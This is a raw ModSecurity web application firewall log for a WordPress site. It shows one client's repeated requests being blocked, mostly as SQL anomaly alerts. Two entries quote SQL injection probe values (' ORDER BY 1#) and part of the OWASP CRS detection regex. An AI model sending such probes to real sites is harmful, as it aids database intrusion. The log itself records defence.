[pid 26175:tid 140110993504000] [client 92.51.2.78:32786] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM8UusHEVNaz1QkYN6ngAAAM8"] [Sun Aug 18 00:56:02.629068 2024] [:error] [pid 26175:tid 140111174412032] [client 92.51.2.78:32788] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM8kusHEVNaz1QkYN6nwAAAMI"] [Sun Aug 18 00:56:03.258440 2024] [:error] [pid 25550:tid 140111018682112] [client 92.51.2.78:32790] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM8_n89YewL24c7_QP1AAAAEw"] [Sun Aug 18 00:56:03.769202 2024] [:error] [pid 26175:tid 140111182804736] [client 92.51.2.78:32792] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM80usHEVNaz1QkYN6oAAAAME"] [Sun Aug 18 00:56:04.613633 2024] [:error] [pid 26175:tid 140111085823744] [client 92.51.2.78:32794] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM9EusHEVNaz1QkYN6oQAAAMQ"] [Sun Aug 18 00:56:05.232004 2024] [:error] [pid 25551:tid 140111182804736] [client 92.51.2.78:32796] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM9SSCXpUXSc3dPnIVEQAAAIE"] [Sun Aug 18 00:56:05.763742 2024] [:error] [pid 25551:tid 140111060645632] [client 92.51.2.78:32798] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM9SSCXpUXSc3dPnIVEgAAAIc"] [Sun Aug 18 00:56:05.997168 2024] [:error] [pid 25550:tid 140111035467520] [client 92.51.2.78:32800] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM9fn89YewL24c7_QP1QAAAEo"] [Sun Aug 18 00:56:06.733179 2024] [:error] [pid 25550:tid 140111182804736] [client 92.51.2.78:32802] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM9vn89YewL24c7_QP1gAAAEE"] [Sun Aug 18 00:56:07.352215 2024] [:error] [pid 25549:tid 140110959933184] [client 92.51.2.78:32804] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM95VyS4wZaDPTA77mUAAAABM"] [Sun Aug 18 00:56:08.073616 2024] [:error] [pid 25551:tid 140111052252928] [client 92.51.2.78:32806] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-CSCXpUXSc3dPnIVEwAAAIg"] [Sun Aug 18 00:56:08.622123 2024] [:error] [pid 25551:tid 140111043860224] [client 92.51.2.78:32808] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-CSCXpUXSc3dPnIVFAAAAIk"] [Sun Aug 18 00:56:09.054032 2024] [:error] [pid 25551:tid 140111094216448] [client 92.51.2.78:32810] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-SSCXpUXSc3dPnIVFQAAAIM"] [Sun Aug 18 00:56:09.660037 2024] [:error] [pid 26175:tid 140110959933184] [client 92.51.2.78:32812] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-UusHEVNaz1QkYN6ogAAANM"] [Sun Aug 18 00:56:10.244326 2024] [:error] [pid 25550:tid 140111085823744] [client 92.51.2.78:32814] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-vn89YewL24c7_QP1wAAAEQ"] [Sun Aug 18 00:56:10.951996 2024] [:error] [pid 25551:tid 140111077431040] [client 92.51.2.78:32816] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-iSCXpUXSc3dPnIVFgAAAIU"] [Sun Aug 18 00:56:11.397383 2024] [:error] [pid 25551:tid 140110951540480] [client 92.51.2.78:32818] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-ySCXpUXSc3dPnIVFwAAAJQ"] [Sun Aug 18 00:56:11.971033 2024] [:error] [pid 25551:tid 140111085823744] [client 92.51.2.78:32820] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM-ySCXpUXSc3dPnIVGAAAAIQ"] [Sun Aug 18 00:56:12.585103 2024] [:error] [pid 25551:tid 140110934755072] [client 92.51.2.78:32822] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM_CSCXpUXSc3dPnIVGQAAAJY"] [Sun Aug 18 00:56:13.248933 2024] [:error] [pid 25550:tid 140111069038336] [client 92.51.2.78:32824] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM_fn89YewL24c7_QP2AAAAEY"] [Sun Aug 18 00:56:13.680816 2024] [:error] [pid 25549:tid 140110951540480] [client 92.51.2.78:32826] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM_ZVyS4wZaDPTA77mUQAAABQ"] [Sun Aug 18 00:56:14.381984 2024] [:error] [pid 25550:tid 140111043860224] [client 92.51.2.78:32828] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: %' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM_vn89YewL24c7_QP2QAAAEk"] [Sun Aug 18 00:56:14.864292 2024] [:error] [pid 25550:tid 140111060645632] [client 92.51.2.78:32830] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM_vn89YewL24c7_QP2gAAAEc"] [Sun Aug 18 00:56:15.525411 2024] [:error] [pid 26175:tid 140111077431040] [client 92.51.2.78:32832] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM_0usHEVNaz1QkYN6owAAAMU"] [Sun Aug 18 00:56:16.140996 2024] [:error] [pid 25550:tid 140110934755072] [client 92.51.2.78:32834] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNAPn89YewL24c7_QP2wAAAFY"] [Sun Aug 18 00:56:16.660650 2024] [:error] [pid 25550:tid 140111010289408] [client 92.51.2.78:32836] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNAPn89YewL24c7_QP3AAAAE0"] [Sun Aug 18 00:56:17.158159 2024] [:error] [pid 26175:tid 140111010289408] [client 92.51.2.78:32838] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNAUusHEVNaz1QkYN6pAAAAM0"] [Sun Aug 18 00:56:18.172354 2024] [:error] [pid 26175:tid 140111018682112] [client 92.51.2.78:32840] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNAkusHEVNaz1QkYN6pQAAAMw"] [Sun Aug 18 00:56:18.724755 2024] [:error] [pid 25549:tid 140110976718592] [client 92.51.2.78:32842] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNApVyS4wZaDPTA77mUgAAABE"] [Sun Aug 18 00:56:19.208205 2024] [:error] [pid 26175:tid 140111052252928] [client 92.51.2.78:32844] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNA0usHEVNaz1QkYN6pgAAAMg"] [Sun Aug 18 00:56:19.784512 2024] [:error] [pid 25551:tid 140111035467520] [client 92.51.2.78:32846] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 